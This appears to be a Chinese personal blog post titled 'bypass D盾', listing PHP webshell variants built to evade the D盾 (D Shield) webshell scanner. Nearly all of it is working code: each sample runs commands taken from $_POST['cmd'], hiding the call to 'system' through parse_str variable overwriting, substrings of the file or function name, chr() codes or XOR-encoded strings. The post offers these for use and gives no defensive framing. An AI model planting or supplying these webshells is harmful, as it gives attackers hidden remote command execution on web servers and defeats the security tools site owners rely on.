lockcy's cave
0%

bypass d盾

发表于 更新于
本文字数: 919 阅读时长 ≈ 1 分钟

20220211 update
20200103 update

~ d盾2020.1.3免杀 ~
~ https://www.bacde.me/post/Webshellkill-Bypass-Php-Webshell/ ~

免杀(D盾2.1.6.2)
parse_str变量覆盖

1
2
3
4
5
<?php

$b = $_POST['cmd'];
parse_str("a=$b");
print_r(`$a`);

利用文件名构造函数

1
2
<?php
substr(__FILE__, -10, -4)($_POST['cmd']);

利用函数名构造函数

1
2
3
4
5
6
<?php
function systema()
{
    substr(__FUNCTION__, -7, -1)($_POST['cmd']);
}
systema();

php7

1
2
3
4
5
6
7
8
9
10
11
12
<?php
class User
{
    public $name = '';
    function setName($a){
        $this->name = $a;
        //(("\x13"^"`").("\x19"^"`").("\x13"^"`").("\x14"^"`").("\x05"^"`").("\x0d"^"`"))($this->name);
        (chr(115).chr(121).chr(115).chr(116).chr(101).chr(109))($this->name);
    }
}
$user = new User;
$user->setName($_POST['cmd']);